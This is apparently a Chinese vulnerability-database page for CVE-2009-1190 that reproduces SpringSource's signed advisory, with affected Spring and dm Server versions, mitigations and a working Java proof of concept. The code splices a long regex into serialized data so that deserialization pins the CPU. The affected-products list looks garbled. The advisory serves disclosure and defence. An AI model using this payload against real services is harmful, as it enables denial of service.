Sun Java Development Kit 'java.util.regex.Pattern.compile'算法复杂性漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1182915 漏洞类型 资源管理错误
发布时间 2009-04-27 更新时间 2009-04-27
CVE编号 CVE-2009-1190 CNNVD-ID CNNVD-200904-501
漏洞平台 N/A CVSS评分 5.0
|漏洞来源
https://www.securityfocus.com/bid/79529
https://cxsecurity.com/issue/WLB-2009040243
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200904-501
|漏洞详情
SunJavaDevelopmentKit(JDK)1.6之前版本中的java.util.regex.Pattern.compile方法存在算法复杂性漏洞。当和spring.jar一起在SpringSourceSpringFramework1.1.0到2.5.6版本,3.0.0.M1到3.0.0.M2版本以及dmServer1.0.0到1.0.2版本中被使用时,远程攻击者可以借助连续化的数据和一个长的regex字符串,引起拒绝服务攻击(CPU损耗)。该长的regex字符串包含多个可选的groups。此漏洞与CVE-2004-2540相关。
|漏洞EXP
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

CVE-2009-1190: Spring Framework Remote Denial of Service Vulnerability

Severity: Low

Vendor: SpringSource

Versions Affected:
Spring Framework 1.1.0-2.5.6, 3.0.0.M1-3.0.0.M2
dm Server 1.0.0-1.0.2 (note 2.x not affected since dm Server 2.x requires a 1.6 JDK)

Description:
The j.u.r.Pattern.compile method in Sun 1.5 JDK has a problem ([1],[2]) with exponential compilation times, when using optional groups. A workaround [3] was implemented in 1.4.2_06 but the root cause of poor performance in regex processing was not resolved until JDK 1.6.
JdkRegexpMethodPointcut calls Pattern.compile(source[i]); via it's inherited readObject method (from AbstractRegexpMethodPointcut). When Sun JVM 1.5 driven application with spring.jar in its classpath accepts serializable data, an attacker could use a long regex string with many optional groups to consume enormous CPU resources. And, with a few requests all listeners will be occupied with compiling regex expressions forever.

Mitigation:
* Users of all products may upgrade to JRE/JDK 1.6 which includes the fix for the root cause
* Spring Framework 2.5.6.SEC01 has been released for Community users that includes a workaround to the root cause - see[4] for upgrade steps
* Spring Framework 2.5.6.SR02 is available for Enterprise users that includes a workaround to the root cause; The software can be found in the Customer Portal [5]
* Disable functionality that accepts serializable data from untrusted sources
* Spring Framework 3.0.0.M3 will be released shortly that includes a workaround to the root cause
* dm Server 1.0.2 Community users may replace the Spring Framework 2.5.6 jar with 2.5.6.SEC01 - see[4] for upgrade steps
* dm Server 1.0.3 that includes a workaround to the root cause will be released shortly
* Instrumented Spring Framework 2.5.6.SR02 that includes a workaround to the root cause will be released by April 27, 2009

Example:
public class DoSSpring {

static byte[] getSerialized(Object o) throws Exception {
  ByteArrayOutputStream baos = new ByteArrayOutputStream();
  ObjectOutputStream oos = new ObjectOutputStream(baos);
  oos.writeObject(o);
  oos.flush();
  oos.close();
  return baos.toByteArray();
 }

public static void main(String[] a) throws Exception{
  String thePattern="(Y)?(K)?(W)?(I)?(U)?(G)?(S)?(E)?(Q)?(C)?(O)?(A)?(M)?(Y)" +
      "?(K)?(W)?(I)?(U)?(G)?(S)?(E)?(Q)?(C)?(O)?(A)?(M)?(Y)?(K)" +
      "?(W)?(I)?(U)?(a)?$";
  String longerPattern = thePattern.substring(0,thePattern.length()-1)+thePattern;
  int length = longerPattern.length();
  String fakePattern = longerPattern.replaceAll(".", "A");
  JdkRegexpMethodPointcut jrmp = new JdkRegexpMethodPointcut();
  jrmp.setPattern(fakePattern);
  System.out.println(jrmp);
  byte[] theArray = getSerialized(jrmp);
  int i = 0;
  for (; i < theArray.length;i++) {
   if (((char)theArray[i])=='A' &&((char)theArray[i+1]=='A')) {
    break;
   }
  }
  System.arraycopy(longerPattern.getBytes(), 0, theArray, i, length);

ByteArrayInputStream bis = new ByteArrayInputStream(theArray);
  ObjectInputStream ois = new ObjectInputStream(bis);
  Object o = ois.readObject(); // returns after a very very long time

}
}

Credit:
This issue was discovered by the RedHat Security Response Team

References:
[1] http://www.packetstormsecurity.org/hitb06/DAY_1_-_Marc_Schoenefeld_-_Pen
testing_Java_J2EE.pdf
[2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2540
[3] http://archive.cert.uni-stuttgart.de/uniras/2005/01/msg00035.html
[4] http://www.springsource.com/securityadvisory
[5] http://www.springsource.com/spring_account_file
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)

iEYEARECAAYFAknxfZcACgkQb7IeiTPGAkMX0gCdGsE5fqOd0PcMdcYrLTwyejGp
4p0An1Dwr9T+WsCwytVrztkskexVw84T
=zBj5
-----END PGP SIGNATURE-----
|受影响的产品
SunLight CMS Jdk 1.4.2 _14 SunLight CMS Jdk 1.4.2 SunLight CMS Jdk 1.4.1 _07 SunLight CMS Jdk 1.5.0 Update 8 SunLight CMS Jdk 1.5.0 Update 6 SunLight CMS Jdk 1.5.0 Update
|参考资料

来源:CONFIRM
链接:https://bugzilla.redhat.com/show_bug.cgi?id=497161
来源:XF
名称:springframework-data-dos(50083)
链接:http://xforce.iss.net/xforce/xfdb/50083
来源:www.springsource.com
链接:http://www.springsource.com/securityadvisory
来源:BUGTRAQ
名称:20090424CVE-2009-1190:SpringFrameworkRemoteDenialofServiceVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/502926/100/0/threaded
来源:MISC
链接:http://www.packetstormsecurity.org/hitb06/DAY_1_-_Marc_Schoenefeld_-_Pentesting_Java_J2EE.pdf
来源:SECUNIA
名称:34892
链接:http://secunia.com/advisories/34892